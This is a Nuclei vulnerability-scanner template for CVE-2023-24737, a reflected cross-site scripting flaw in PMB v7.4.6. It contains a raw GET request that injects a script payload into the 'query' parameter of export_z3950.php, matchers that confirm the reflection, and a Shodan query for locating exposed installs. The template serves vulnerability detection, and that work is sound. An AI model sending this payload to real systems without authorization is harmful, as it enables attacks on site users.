nuclei-templates/http/cves/2023/CVE-2023-24737.yaml

52 lines
1.4 KiB
YAML
Raw Normal View History

2023-03-31 11:28:24 +00:00
id: CVE-2023-24737
info:
name: PMB v7.4.6 - Cross-Site Scripting
2023-03-31 11:28:24 +00:00
author: r3Y3r53
severity: medium
description: |
PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of PMB.
2023-03-31 11:28:24 +00:00
reference:
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
- https://github.com/AetherBlack/CVE/tree/main/PMB
- https://nvd.nist.gov/vuln/detail/CVE-2023-24737
2023-03-31 11:28:24 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-03-31 11:28:24 +00:00
cve-id: CVE-2023-24737
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00064
epss-percentile: 0.26505
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:*
2023-03-31 11:28:24 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: pmb_project
product: pmb
2023-09-06 11:43:37 +00:00
shodan-query: http.favicon.hash:1469328760
2023-03-31 11:28:24 +00:00
tags: cve,cve2023,xss,pmb
http:
2023-03-31 11:28:24 +00:00
- raw:
- |
GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '3@1=<script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200